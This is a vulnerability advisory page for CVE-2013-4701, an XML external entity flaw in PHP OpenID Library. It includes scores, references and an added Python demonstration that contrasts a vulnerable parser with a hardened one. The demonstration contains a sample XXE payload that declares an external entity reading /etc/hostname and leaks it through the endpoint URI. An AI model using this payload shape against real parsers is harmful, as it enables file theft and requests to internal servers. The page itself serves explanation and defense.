Vulnerability Details : CVE-2013-4701
Auth/Yadis/XML.php in PHP OpenID Library 2.2.2 and earlier allows remote attackers to read arbitrary files, send HTTP requests to intranet servers, or cause a denial of service (CPU and memory consumption) via XRDS data containing an external entity declaration in conjunction with an entity reference, related to an XML External Entity (XXE) issue.
Vulnerability category: XML external entity (XXE) injection; Denial of service
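The description names the two ingredients of the bug: an entity declaration in the DTD of an attacker-served XRDS document, and a reference to that entity inside the document body. A parser that resolves external entities turns the reference into a local file read or an outbound request (the "intranet servers" case), and a parser that expands internal entities without limit can be driven into the CPU/memory exhaustion also listed. The script below is an added example, not code from php-openid or from this page: it uses Python's stdlib expat binding instead of PHP's libxml so it runs stand-alone, and it shows the same XRDS document parsed once the vulnerable way (external entities resolved) and once the hardened way (any DOCTYPE or entity declaration refused, no resolver installed). The XRDS documents, the `file:///etc/hostname` target, the `FAKE_FILESYSTEM` resolver table and the function names are constructed for the example; the hardened mode follows what the fix commit's title says it does (disable external entities), not the patch's actual PHP.

```python
"""Added example (not php-openid code): the XXE shape behind CVE-2013-4701
parsed by a vulnerable resolver and by a hardened parser, using stdlib expat."""
import xml.parsers.expat


class XXEError(ValueError):
    """Raised by the hardened parser when the XRDS carries a DTD or entity."""


# Constructed input: an XRDS discovery document as a hostile OpenID identity
# page could serve it. The DOCTYPE declares an external entity and the
# service URI references it: "external entity declaration in conjunction
# with an entity reference", as the advisory puts it.
MALICIOUS_XRDS = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE xrds [
  <!ENTITY xxe SYSTEM "file:///etc/hostname">
]>
<xrds:XRDS xmlns:xrds="xri://$xrds" xmlns="xri://$xrd*($v*2.0)">
  <XRD>
    <Service priority="0">
      <Type>http://specs.openid.net/auth/2.0/server</Type>
      <URI>https://op.example.test/endpoint?leak=&xxe;</URI>
    </Service>
  </XRD>
</xrds:XRDS>
"""

# Constructed input: the same discovery document with no DTD at all.
BENIGN_XRDS = """<?xml version="1.0" encoding="UTF-8"?>
<xrds:XRDS xmlns:xrds="xri://$xrds" xmlns="xri://$xrd*($v*2.0)">
  <XRD>
    <Service priority="0">
      <Type>http://specs.openid.net/auth/2.0/server</Type>
      <URI>https://op.example.test/endpoint</URI>
    </Service>
  </XRD>
</xrds:XRDS>
"""

# Stand-in for what the resolver would read, so the example runs offline and
# touches no real file (assumed content, not real data).
FAKE_FILESYSTEM = {"file:///etc/hostname": "rp-internal-host\n"}


def parse_xrds_uris(xml_text, hardened):
    """Return the text of every <URI> element in an XRDS document.

    hardened=False mirrors a parser that resolves external entities, the
    behaviour the vulnerable library relied on. hardened=True is the
    equivalent of the fix: no DTD, no entity declarations, no resolver.
    """
    uris, chunks, state = [], [], {"in_uri": False}
    parser = xml.parsers.expat.ParserCreate()

    def start_element(name, attrs):
        state["in_uri"] = name == "URI"

    def char_data(data):
        # Entity content, once resolved, arrives here exactly like literal text.
        if state["in_uri"]:
            chunks.append(data)

    def end_element(name):
        if name == "URI":
            uris.append("".join(chunks).strip())
            chunks.clear()
            state["in_uri"] = False

    parser.StartElementHandler = start_element
    parser.CharacterDataHandler = char_data
    parser.EndElementHandler = end_element

    if hardened:
        # Refuse the DTD before anything inside it can be declared. This also
        # blocks internal-entity expansion attacks (the CPU/memory DoS case).
        def reject_doctype(name, sysid, pubid, has_internal_subset):
            raise XXEError("XRDS must not carry a DOCTYPE")

        def reject_entity(name, is_param, value, base, sysid, pubid, notation):
            raise XXEError("entity declaration %r refused" % name)

        parser.StartDoctypeDeclHandler = reject_doctype
        parser.EntityDeclHandler = reject_entity
        # No ExternalEntityRefHandler is installed: nothing is ever fetched.
    else:
        # Vulnerable behaviour: fetch whatever the SYSTEM identifier names and
        # splice it into the document. Served from FAKE_FILESYSTEM here; a real
        # resolver would read the file or issue the HTTP request (the SSRF case).
        def resolve_external(context, base, system_id, public_id):
            child = parser.ExternalEntityParserCreate(context)
            child.Parse(FAKE_FILESYSTEM.get(system_id, ""), True)
            return 1

        parser.ExternalEntityRefHandler = resolve_external

    parser.Parse(xml_text, True)
    return uris


def hardened_rejects(xml_text):
    """True if the hardened parser refuses the document outright."""
    try:
        parse_xrds_uris(xml_text, hardened=True)
    except XXEError:
        return True
    return False


if __name__ == "__main__":
    print("vulnerable:", parse_xrds_uris(MALICIOUS_XRDS, hardened=False))
    print("hardened, benign:", parse_xrds_uris(BENIGN_XRDS, hardened=True))
    print("hardened rejects malicious:", hardened_rejects(MALICIOUS_XRDS))
```

In the vulnerable mode the leaked content lands inside the OpenID endpoint URI, which the relying party then uses for its next request, so the attacker gets the data back without ever seeing the victim's parser output directly. Refusing any DOCTYPE is stricter than only disabling external entity loading, but an XRDS document has no legitimate need for a DTD, so it is the safer check for this input.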
Products affected by CVE-2013-4701
- cpe:2.3:a:janrain:php-openid:*:*:*:*:*:*:*:*
Exploit prediction scoring system (EPSS) score for CVE-2013-4701
EPSS score: 0.64% (probability of exploitation activity in the next 30 days)
EPSS percentile: ~77% (the proportion of vulnerabilities scored at or below this score)
CVSS scores for CVE-2013-4701
Base Score | Base Severity | CVSS Vector (v2) | Exploitability Score | Impact Score | Score Source | First Seen
---|---|---|---|---|---|---
7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P | 10.0 | 6.4 | NIST |
References for CVE-2013-4701
- http://lists.opensuse.org/opensuse-security-announce/2016-08/msg00028.html
  [security-announce] openSUSE-SU-2016:2025-1: important: Important securi
- http://jvndb.jvn.jp/jvndb/JVNDB-2013-000080
  JVNDB-2013-000080 - JVN iPedia - Vulnerability Countermeasure Information Database
- http://jvn.jp/en/jp/JVN24713981/index.html
  JVN#24713981: PHP OpenID Library vulnerable to XML external entity injection
- http://lists.opensuse.org/opensuse-updates/2016-08/msg00083.html
  openSUSE-SU-2016:2114-1: moderate: Security update for typo3-cms-4_7
- https://github.com/openid/php-openid/commit/625c16bb28bb120d262b3f19f89c2c06cb9b0da9
  disable external XML entities and libxml errors · openid/php-openid@625c16b · GitHub (tagged: Exploit; Patch)